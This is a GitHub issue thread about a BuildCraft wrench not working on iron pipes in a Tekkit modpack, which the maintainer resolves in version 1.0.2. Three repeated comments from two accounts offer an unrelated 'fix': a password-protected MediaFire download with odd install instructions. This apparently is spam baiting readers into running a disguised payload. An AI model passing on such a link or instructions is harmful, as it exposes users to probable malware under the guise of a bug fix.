### ISSUE TITLE
Buildcraft Wrench Not Working on Iron Pipes

### ISSUE THREAD

**Issue by jessethegr8** [xJon/Tekkit-SMP#7]
### Was this bug reported before?

- [X] No, it was not.

### Please describe the issue you are experiencing

Made maceration machine and tried to utilize iron pipes but to no avail since I could not chnage their postioning/input and output sides with the buildcraft wrench. Thanks for any help provided.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xJon** [comment]
The mod author responded that currently they can be changed by shift-right-clicking (with an empty hand).

**Comment by xJon** [comment]
A wrench is now required & working properly with version `1.0.2` :)
